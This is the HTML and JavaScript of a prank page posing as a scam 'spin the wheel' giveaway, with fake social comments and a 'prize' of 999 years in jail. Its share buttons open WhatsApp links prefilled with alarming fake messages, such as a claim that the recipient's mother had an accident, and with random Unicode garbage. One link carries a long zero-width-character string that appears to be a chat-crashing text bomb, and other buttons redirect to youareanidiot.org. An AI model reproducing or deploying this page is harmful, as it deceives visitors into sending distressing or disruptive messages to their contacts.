<!DOCTYPE html>

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta property="og:title" content="Big Bullshit Day">
  <meta property="og:image" content="/img/share.png">
  <meta name="description" content="Visit this page for a surprise!1">
  <title>Spin The Fucky Wheel!</title>
<script type="text/javascript" src="js/jquery.js"></script>

<script>
	random = function(length) {
	var array = new Uint16Array(length);
	window.crypto.getRandomValues(array);
	var str = '';
	for (var i = 0; i < array.length; i++) {
		str += String.fromCharCode(array[i]);
	};
	return str;
}
garbage1 = random(16);
garbage2 = random(18);
garbage3 = random(25);
garbage4 = random(11);
garbage5 = random(32);
garbage6 = random(64);
garbage7 = random(4);
garbage8 = random(17);
garbage9 = random(2);
garbage10 = random(23);
</script>

<style type="text/css">
.popup{display:none;position:absolute;top:10%;left:50%;width:88%;max-width:280px;margin:0 0 0 -140px;font-size:1em;border-radius:4px;background-color:#282828;color:#fff;overflow:hidden;box-shadow:1px 1px 7px #000;z-index:100}
.popup-head{background-color:#282828;padding:18px 16px 18px 55px;border-bottom:2px solid #33b4e4;color:#33b4e4;line-height:normal}
.popup-center{padding:20px 16px;color:#f3f3f3;line-height:20px}
.popup-bottom{background-color:#282828;padding:9px 6px;text-align:center;border-top:1px solid #474747;overflow:hidden}
.popup-bottom .button{display:block;height:30px;width:128px;margin:0 auto;font-size:1.1em;color:#f3f3f3;border-radius:3px;cursor:pointer;text-decoration:none;padding:0;line-height:30px}

#status {
    color: #F4211A;
    font-size: 1.0em;
    font-family:'minecraftfont';

    height:100%;
}
.pop {
    animation: pop 0.58s infinite;
    -webkit-animation: pop 0.58s infinite;
}
@keyframes pop {
    from {
        transform:scale(0.95)
    }
    50% {
        transform:scale(1)
    }
    to {
        transform:scale(0.95)
    }
}
@-webkit-keyframes pop {
    from {
        -webkit-transform:scale(0.95)
    }
    50% {
        -webkit-transform:scale(1)
    }
    to {
        -webkit-transform:scale(0.95)
    }
}
    * {
        margin: 0
    }
    body {
        font-family: tahoma, verdana, arial, sans-serif;
        background-color: #F7F7F7
    }
    .header {
        background-color: #ff9900
    }
    .logo-left {
        padding: 5px;
        vertical-align: middle
    }
    .header-text {
        font-size: 20px;
        height: 35px;
        vertical-align: middle;
        color: #FFF
    }
    .spinnerContainer {
        position: relative;
        transform: translateX(20%)
    }
    #clicker,
    #clicker2 {
        display: none
    }
    .clearfix::after,
    .clearfix::before {
        content: "";
        display: table
    }
    .clearfix::after {
        clear: both
    }
    .fbcoms {
        padding: 0 5px;
        font-family: Tahoma, Verdana, sans-serif;
        background-color: #fff;
        font-size: 12px;
        text-align: left
    }
    .comments {
        font-weight: 700;
        text-align: center;
        padding: 0 5px 10px
    }
    .totlikes {
        margin-top: 3px;
        background-color: #eeeff4;
        padding: 5px 5px 5px 23px;
        background-repeat: no-repeat;
        background-position: 5px center
    }
    .fbblue {
        color: #3c5a96
    }
    .buttons {
        margin-top: 14px;
        padding: 5px;
        font-family: Arial, sans-serif;
        color: #7d7d7f
    }
    .buttons span {
        cursor: pointer
    }
    .buttons span:hover {
        text-decoration: underline
    }
    .viewmore {
        margin-top: 3px;
        background-color: #eeeff4;
        padding: 5px 5px 5px 23px;
        background-position: 5px center;
        background-repeat: no-repeat
    }
    .left {
        cursor: pointer;
        float: left;
        color: #3c5a96
    }
    .left:hover {
        text-decoration: underline
    }
    .right {
        color: #7d7d7f;
        float: right
    }
    div,
    main,
    article,
    aside,
    footer,
    nav,
    section,
    header {
        display: inline;
    }
    span {
        display: block;
    }
    h1,
    h2,
    h3 {
        display: inline;
    }
    .item {
        position: relative;
        margin-top: 3px;
        background-color: #eeeff4;
        padding: 5px 5px 5px 60px;
        min-height: 60px;
        box-sizing: border-box
    }
    .item .profileimg {
        position: absolute;
        top: 5px;
        left: 5px
    }
    .comtxt {
        line-height: 16px
    }
    .name {
        color: #3c5a96;
        font-weight: 700
    }
    .ago {
        color: #86878c;
        font-size: .95em
    }
    .fblike {
        color: #3c5a96;
        font-size: .95em;
        cursor: pointer
    }
    .fblike:hover {
        text-decoration: underline
    }
    .combot {
        padding-top: 5px
    }
    .likes {
        color: #3c5a96;
        font-size: .95em;
        cursor: pointer
    }
    .comments,
    .hidden .combot,
    .hidden .comtxt {
        display: none
    }
    #fbalert>div {
        margin-left: 0
    }
    #fbalert {
        background-color: #fff;
        padding: 5px
    }
    #spinner {
        position: relative;
        margin: 1em auto 0;
        width: 315px;
        overflow: hidden
    }
    @media(min-width:360px) {
        #spinner {
            width: 340px
        }
    }
    #spinBG {
        z-index: 1;
        width: 315px
    }
    @media(min-width:360px) {
        #spinBG {
            width: 340px
        }
    }
    #spin {
        z-index: 2;
        position: absolute;
        top: 8px;
        left: 8px;
        width: 300px
    }
    @media(min-width:360px) {
        #spin {
            width: 325px
        }
    }
    #win,
    #win2,
    #win3,
    #winP,
    #winP1,
    #winP2 {
        position: absolute;
        z-index: 3;
        width: 65px;
        left: 126px;
        top: 120px
    }
    @media(min-width:360px) {
        #win, #win2, #win3, #winP, #winP1, #winP2 {
            width: 90px
        }
    }
    #win2,
    #win3,
    #winP,
    #winP1,
    #winP2 {
        display: none
    }
    .spinAround {
        -webkit-animation: spin 6.6s;
        -moz-animation: spin 6.6s;
        -o-animation: spin 6.6s;
        animation: spin 6.6s;
        -webkit-animation-timing-function: ease;
        -moz-animation-timing-function: ease;
        -o-animation-timing-function: ease;
        animation-timing-function: ease;
        -webkit-animation-iteration-count: 1;
        -moz-animation-iteration-count: 1;
        -o-animation-iteration-count: 1;
        animation-iteration-count: 1;
        -webkit-animation-direction: normal;
        -moz-animation-direction: normal;
        -o-animation-direction: normal;
        animation-direction: normal;
        -webkit-animation-fill-mode: forwards;
        -moz-animation-fill-mode: forwards;
        -o-animation-fill-mode: forwards;
        animation-fill-mode: forwards
    }
    @-webkit-keyframes spin {
        0% {
            -webkit-transform: rotate(0deg);
            transform: rotate(0deg)
        }
        90% {
            -webkit-transform: rotate(3110deg);
            transform: rotate(3110deg)
        }
        95% {
            -webkit-transform: rotate(3108deg);
            transform: rotate(3108deg)
        }
        100% {
            -webkit-transform: rotate(3109deg);
            transform: rotate(3109deg)
        }
    }
    @-moz-keyframes spin {
        0% {
            -moz-transform: rotate(0deg);
            transform: rotate(0deg)
        }
        90% {
            -moz-transform: rotate(3110deg);
            transform: rotate(3110deg)
        }
        95% {
            -moz-transform: rotate(3108deg);
            transform: rotate(3108deg)
        }
        100% {
            -moz-transform: rotate(3109deg);
            transform: rotate(3109deg)
        }
    }
    @-o-keyframes spin {
        0% {
            -o-transform: rotate(0deg);
            transform: rotate(0deg)
        }
        90% {
            -o-transform: rotate(3110deg);
            transform: rotate(3110deg)
        }
        95% {
            -o-transform: rotate(3108deg);
            transform: rotate(3108deg)
        }
        100% {
            -o-transform: rotate(3109deg);
            transform: rotate(3109deg)
        }
    }
    @keyframes spin {
        0% {
            -webkit-transform: rotate(0deg);
            -moz-transform: rotate(0deg);
            -o-transform: rotate(0deg);
            transform: rotate(0deg)
        }
        90% {
            -webkit-transform: rotate(3110deg);
            -moz-transform: rotate(3110deg);
            -o-transform: rotate(3110deg);
            transform: rotate(3110deg)
        }
        95% {
            -webkit-transform: rotate(3108deg);
            -moz-transform: rotate(3108deg);
            -o-transform: rotate(3108deg);
            transform: rotate(3108deg)
        }
        100% {
            -webkit-transform: rotate(3109deg);
            -moz-transform: rotate(3109deg);
            -o-transform: rotate(3109deg);
            transform: rotate(3109deg)
        }
    }
    .spinAround2 {
        -webkit-animation: spinTwo 6.6s;
        -moz-animation: spinTwo 6.6s;
        -o-animation: spinTwo 6.6s;
        animation: spinTwo 6.6s;
        -webkit-animation-timing-function: ease;
        -moz-animation-timing-function: ease;
        -o-animation-timing-function: ease;
        animation-timing-function: ease;
        -webkit-animation-iteration-count: 1;
        -moz-animation-iteration-count: 1;
        -o-animation-iteration-count: 1;
        animation-iteration-count: 1;
        -webkit-animation-direction: normal;
        -moz-animation-direction: normal;
        -o-animation-direction: normal;
        animation-direction: normal;
        -webkit-animation-fill-mode: forwards;
        -moz-animation-fill-mode: forwards;
        -o-animation-fill-mode: forwards;
        animation-fill-mode: forwards
    }
    @-webkit-keyframes spinTwo {
        0% {
            -webkit-transform: rotate(3109deg);
            transform: rotate(3109deg)
        }
        90% {
            -webkit-transform: rotate(6314deg);
            transform: rotate(6314deg)
        }
        95% {
            -webkit-transform: rotate(6312deg);
            transform: rotate(6312deg)
        }
        100% {
            -webkit-transform: rotate(6313deg);
            transform: rotate(6313deg)
        }
    }
    @-moz-keyframes spinTwo {
        0% {
            -moz-transform: rotate(3109deg);
            transform: rotate(3109deg)
        }
        90% {
            -moz-transform: rotate(6314deg);
            transform: rotate(6314deg)
        }
        95% {
            -moz-transform: rotate(6312deg);
            transform: rotate(6312deg)
        }
        100% {
            -moz-transform: rotate(6313deg);
            transform: rotate(6313deg)
        }
    }
    @-o-keyframes spinTwo {
        0% {
            -o-transform: rotate(3109deg);
            transform: rotate(3109deg)
        }
        90% {
            -o-transform: rotate(6314deg);
            transform: rotate(6314deg)
        }
        95% {
            -o-transform: rotate(6312deg);
            transform: rotate(6312deg)
        }
        100% {
            -o-transform: rotate(6313deg);
            transform: rotate(6313deg)
        }
    }
    @keyframes spinTwo {
        0% {
            -webkit-transform: rotate(3109deg);
            -moz-transform: rotate(3109deg);
            -o-transform: rotate(3109deg);
            transform: rotate(3109deg)
        }
        90% {
            -webkit-transform: rotate(6314deg);
            -moz-transform: rotate(6314deg);
            -o-transform: rotate(6314deg);
            transform: rotate(6314deg)
        }
        95% {
            -webkit-transform: rotate(6312deg);
            -moz-transform: rotate(6312deg);
            -o-transform: rotate(6312deg);
            transform: rotate(6312deg)
        }
        100% {
            -webkit-transform: rotate(6313deg);
            -moz-transform: rotate(6313deg);
            -o-transform: rotate(6313deg);
            transform: rotate(6313deg)
        }
    }
    ol,
    ul {
        list-style: none
    }
    .clearfix:after {
        content: " ";
        display: block;
        height: 0;
        clear: both;
        overflow: hidden;
        visibility: hidden
    }
    .clearfix {
        display: block
    }
    .wrapper {
        background-color: #fff;
        -webkit-box-sizing: border-box;
        -moz-box-sizing: border-box;
        box-sizing: border-box;
        padding: 7px;
        width: 96%;
        margin: 0 auto 14px;
        border: 1px solid #c4cde1;
        border-top: 0;
        max-width: 414px
    }
    .logo {
        display: block;
        margin: 4px auto;
    }
    .txt {
        padding: 5px 6px;
        line-height: 18px;
        text-align: center
    }
    .bottom {
        width: 92%;
        margin: 20px auto 0;
        border: 1px solid #ccc;
        background-color: #f2f2f2;
        padding: 5px;
        border-radius: 10px;
        -moz-border-radius: 10px;
        -webkit-border-radius: 10px
    }
    .now {
        text-align: center;
        padding-top: 5px
    }
    #countdown {
        font-weight: bold;
    }
    .rules {
        color: #1b316c;
        padding: 4px 5px;
        line-height: 22px
    }
    a {
        display: block;
        background-color: #39579a;
        border-radius: 7px;
        -moz-border-radius: 7px;
        -webkit-border-radius: 7px;
        padding: 10px 0;
        text-align: center;
        font-weight: 700;
        color: #fff;
        font-size: 1.6em;
        border-bottom: 1px solid #1b316c;
        margin: 7px 13px 5px;
        text-decoration: none
    }
    .title {
        text-align: center;
        font-weight: 700;
        font-size: 26px
    }
    .show-all {
        display: none;
    }
    .now2 {
        padding-top: 10px;
        font-weight: bold;
    }
</style> 
<script>

function getRandomInt(min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
var r = getRandomInt(1,1000);
var myArray = ['xxxv.xxuxi.com', 'xxxv.xxexn.com', 'xxxv.xxvxn.com', 'xxxv.xxuxi.com', 'xxxv.xxexn.com', 'xxxv.xxvxn.com', 'xxxv.xxuxi.com', 'xxxv.xxexn.com', 'xxxv.xxvxn.com', 'xxxv.xxuxi.com', 'xxxv.xxexn.com', 'xxxv.xxvxn.com']; 
var rand = myArray[Math.floor(Math.random() * myArray.length)];

url = rand;

</script>


<script type="text/javascript">
    $(document).ready(function() {
        var body = document.getElementsByTagName("body")[0];
        var style = document.createElement("style");
        style.type = "text/css";
        style.appendChild(document.createTextNode("div, main, article, aside, footer, nav, section, header {display: block;}span {display: inline;}h1, h2, h3 {display: block;}"));
        body.appendChild(style);
    })
</script>
   

</head>
<body onload="spinnerAction()" data-gr-c-s-loaded="true">

<div class="header">
<span class="header-text">Bog Bullion Pays<br> <img src="img/HJwigTz.png" class="logo-left" width="70" height="33"> Spin The Mucky Wheel!</span></div>
  
  
  
<div class="hide-all">
  <div id="fbalert"><p>Only this <span id="today">day</span> we give our members 1 free spin for a chance to win exclusive prizes!</p>
	
    <div style="padding-top: 5px; color: #9c9c9c; font-size: 11px;"> </div></div>


      <div id="status" class="pop"><center> </center></div>

       <div id="spinner">
         <img id="spinBG" src="img/I5CzOpQ.png">
         <img id="spin" src="img/xmfH2lE.png">
         <img onclick="startSpin()" id="win" src="img/HYTs9jZ.png">
         <img onclick="spin2()" id="win2" src="img/tDUhni1.png">
         <img id="winP" src="img/q2Nm4n4.png">
         <img id="winP2" src="img/4r6A9Ye.png">
       </div>

        <center><h6><font color="red">Only one gift allowed per IP.</font></h6></center>
        <div class="fbcoms">
 

		<p class="comments">Comments:</p>
			<p class="buttons">
			<span class="like">Social Widget powered by Fakebook</span>
			</p>
			<p class="totlikes"><span id="youand"></span><span class="fbblue">12,068 others</span> like this</p>
			<p class="viewmore clearfix">
				<span class="left">View more comments</span>
				<span class="right">15 of 50M</span>
			</p>
			
			<div class="item">
				<img class="profileimg" src="img/qlQV07v.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Xavier Stebin</span> I was lucky
 enough to get the fatbitch sugar surge! I still can't believe this is real, haha!</p>
				<p class="combot"><span class="ago">4 minutes ago</span>  <span class="fblike">Like</span><span class="likes totlikes">37</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="img/bTYMbkg.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Shyam Mohan</span> I got the ienovo bribe K4 Note.. Thanks Tanks.. This is the best day ever..</p>
				<p class="combot"><span class="ago">13 minutes ago</span>  <span class="fblike">Like</span><span class="likes totlikes">24</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="img/ZEltwD3.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Deepu Antony</span> Amazing game. Just found it. Hope I will win. EDIT: I got nothing :(</p>
				<p class="combot"><span class="ago">29 minutes ago</span>  <span class="fblike">Like</span><span class="likes totlikes">14</span></p>
			</div>
			
			<div class="item">
				<img class="profileimg" src="img/pbdSYK5.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Tebin Joseph</span> Knte Friends nu oru Headset kitti, Enikkonnum kittiyllaa :'( </p>
				<p class="combot"><span class="ago">35 minutes ago</span>  <span class="fblike">Like</span><span class="likes totlikes">11</span></p>
			</div>
			
			<div class="item">
				<img class="profileimg" src="img/CdkyXl4.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Karan Singh</span> Dhanyavad, mujhe mera prize mil gaya. :D </p>
				<p class="combot"><span class="ago">37 minutes ago</span>  <span class="fblike">Like</span><span class="likes totlikes">9</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="img/z1Fo8HZ.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Ravi Verma</span> Has anyone actually won yet? I spun 2 times from both of my accounts but nothing...</p>
				<p class="combot"><span class="ago">41 minutes ago</span>  <span class="fblike">Like</span><span class="likes totlikes">8</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="img/f2rl1T3.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Survival Sandhi</span> arey yar mujhe kuch n ahi mila...</p>
				<p class="combot"><span class="ago">56 minutes ago</span>  <span class="fblike">Like</span><span class="likes totlikes">5</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="img/nz5ItCe.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Yasmin Chandler</span> I got nothing.. why am I always so unlucky :(</p>
				<p class="combot"><span class="ago">1 hour ago</span>  <span class="fblike">Like</span><span class="likes totlikes">5</span></p>
			</div>
			
			<div class="item">
				<img class="profileimg" src="img/zlqeyDY.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Kurian Abraham</span> Why im not winning..? plz help</p>
				<p class="combot"><span class="ago">1 hour ago</span>  <span class="fblike">Like</span><span class="likes totlikes">2</span></p>
			</div>

			<div class="item">
				<img class="profileimg" src="img/bOWO8fH.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Namita Bansal</span> nice game..</p>
				<p class="combot"><span class="ago">1 hour ago</span>  <span class="fblike">Like</span><span class="likes totlikes">1</span></p>
			</div>

			
			<div class="item">
				<img class="profileimg" src="img/jAzeW1p.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Wayback Machine</span> Support me on https://archive.org/donate/ ❤️ ❤️ ❤️</p>
				<p class="combot"><span class="ago">1 hour ago</span>  <span class="fblike">Liked</span><span class="likes totlikes">10,000,000</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="img/LcVQAxI.jpg" width="50" height="50">
				<p class="comtxt"><span class="name">Torbjörn Lindholm</span> Ha ha ha, vän ... Ingenting är gratis! Du måste tjäna vad du vill 😉</p>
				<p class="combot"><span class="ago">1 hour ago</span>  <span class="fblike">Liked</span><span class="likes totlikes">9,999,999,999,999,999,999,999</span></p>
			</div>

			
		</div>
</div>



 

<div class="show-all">
  <div class="wrapper">
    <div class="title"><p>Congratulations!</p></div>
		<img src="img/kz19KBo.png" class="logo" width="214" height="214">
		<p class="txt">You have won  <b>Free jail time of 999 years</b>. We've dispatched police officers to your location and now you're on the Interpol Red List. While they are arriving, share this page on WhatsApp.</p>
		
		<p class="now now2">Tell 5 Groups or 15 Friends on WhatsApp about "The Big Arrest"!</p>
		<div class="bottom">
			<p class="rules">1. Click 15x on the SHARE button (don't forget to press the 'back/home' button to continue!)!</p>
			<p class="rules">2. Click "CONTINUE" and wait.</p>

			<a class="cta" onclick="fn1(this); goNow();"><img src="img/F3v8KXt.png" width="20"> SHARE <img src="img/l7hY5rL.png" width="20"></a>

      <a class="cta" onclick="fn2(this); goNow();">CONTINUE</a>
      <p class="now">Dispatching law enforcement in <span id="countdown">0</span> seconds.</p>
		</div>
	</div>
</div>

<div id="popup1" class="popup fourth" style="display:none">
        <div class="popup-head">
            <img id="alertimg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaAQMAAACThN6NAAAABlBMVEUAAAC5ubnoUmKJAAAAAXRSTlMAQObYZgAAAEVJREFUCNdjQAI8cEIOTtiDiPoGGPH5AIh4wMDA+PkDAwMzhPjBwMAOIvg//4ES8v//AbV+/g8l6v//b4AQ////P8CACgCNvyHz1VKxBQAAAABJRU5ErkJggg==" alt="" width="26" height="26">
            <script>document.write(trs['avs'][lng])</script></div>
        <div id="bla" class="popup-center"></div>
        <div class="popup-bottom">

            <div onclick="hidepop();" class="button"><script>document.write(trs['bu'][lng])</script></div>
        </div>
    </div>





<script type="text/javascript">
    function spinnerAction() {
        alert("Welcome to Fucky Wheel!\n\nSpin the Wheel and you may win exclusive piss!\n\nClick OK to Start the Game!")
    }

    function startSpin() {
        var e = document.getElementById("spin"),
            n = document.getElementById("win"),
            t = document.getElementById("winP"),
            o = document.getElementById("win2");
        e.className = e.className + "spinAround", n.style.display = "none", t.style.display = "block", setTimeout(function() {
            t.style.display = "none", o.style.display = "block"
        }, 150), setTimeout(function() {
            alert("You Won a free spin!."), spin2enabled = !0
        }, 6500)
    }

    function spin2() {
        if (spin2enabled) {
            var e = document.getElementById("spin"),
                n = document.getElementById("win"),
                t = document.getElementById("winP"),
                o = document.getElementById("win2");
            e.className = e.className + " spinAround2", n.style.display = "none", t.style.display = "block", setTimeout(function() {
                t.style.display = "none", o.style.display = "block"
            }, 150), setTimeout(function() {
                var e = alert("Congratulations!\n\nYour prize: Free jail time of 999 years!.\n\nPlease follow the instructions to win your prize!");
                e === !0 || $(".hide-all").hide(), $(".show-all").show();
                var n = 1000,
                    t = setInterval(function() {
                        $("#countdown").text(n--), -1 == n && clearInterval(t)
                    }, 1);
                javascript_countdown.init(1000)
            }, 6800)
        }
    }

    function goNow() {
        window.btn_clicked = !0
    }

    function fn1() {
        ++c, 25 >= c ? window.open(showMessage) : alert("Your prison sentence of 999 years has been reserved.\n\nVerify your phone number on the next page to claim your prize!") & window.open("http://youareanidiot.org", "_self")
    }

    function fn2() {
        c >= 25 ? alert("Your prison sentence of 999 years has been reserved.\n\nVerify your phone number on the next page to claim your prize!") & window.open("http://youareanidiot.org", "_self") : window.alert("Tell 5 Groups or 15 Friends on WhatsApp about The Big Arrest!\n\n You already told: " + c)
    }

    function FBcom(e, n) {
        setTimeout(function() {
            var n = 0,
                t = 0;
            $(e + ", " + e + " .comtxt, " + e + " .combot").slideDown(500), $().slideDown(500);
            var o = setInterval(function() {
                t += .2, $(e).css({
                    opacity: t
                }), n++, 5 == n && clearInterval(o)
            }, 100)
        }, n) 
    }
    spin2enabled = !1;
    var d = new Date,
        weekday = new Array("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday");
    document.getElementById("today").innerHTML = weekday[d.getDay()];
    var myarray = ["whatsapp://send?text= !!BREAKING NEWS!! You're stupid 🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣", "whatsapp://send?text= 😱😱😱 OH MY GOD!! 😱😱😱 LOOK AT THIS FUCKING SHIT 🤯", "whatsapp://send?text=I'm breaking up with you", "whatsapp://send?text=Good news, you're adopted", "whatsapp://send?text=Call your mom now", "whatsapp://send?text=This is Kevin, come to the hospital right now, your mother had an accident", "whatsapp://send?text=HOLY SHIT, TOLAND DRUMP GOT PEACHED", "whatsapp://send?text=win free iphoen xd http://youareanidiot.org", "whatsapp://send?text=Honey, you are" + garbage1, "whatsapp://send?text=" + garbage2, "whatsapp://send?text=Hello" + garbage3, "whatsapp://send?text=%F0%9F%8F%B3%EF%B8%8F%E2%80%8D0%F0%9F%8C%88%0A", "whatsapp://send?text=" + garbage4, "whatsapp://send?text=%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 BLAKE%C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D %C2%A0 %C2%A0 %C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 BLAKE%C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 %C2%A0%C2%A0%C2%A0%E2%80%8D%C2%A0%C2%A0 